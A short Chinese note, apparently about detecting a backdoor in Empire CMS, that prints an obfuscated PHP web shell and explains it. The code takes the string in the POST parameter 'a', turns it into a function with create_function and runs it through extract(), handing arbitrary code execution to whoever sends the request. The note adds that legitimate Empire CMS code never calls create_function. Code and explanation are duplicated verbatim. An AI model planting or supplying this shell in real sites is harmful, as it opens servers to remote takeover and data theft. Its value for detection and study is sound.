<?php
function fun2(){
$b=$_POST;
return @($b[a]);
}
@extract(array(b=>create_function(NULL,fun2())));
@extract(array(c=>$b()));
?>这段代码,通过create_function函数,使得post上传的字符串,被当作代码来执行。
在帝国cms的源代码中,没有使用这个函数。
<?php
function fun2(){
$b=$_POST;
return @($b[a]);
}
@extract(array(b=>create_function(NULL,fun2())));
@extract(array(c=>$b()));
?>这段代码,通过create_function函数,使得post上传的字符串,被当作代码来执行。
在帝国cms的源代码中,没有使用这个函数。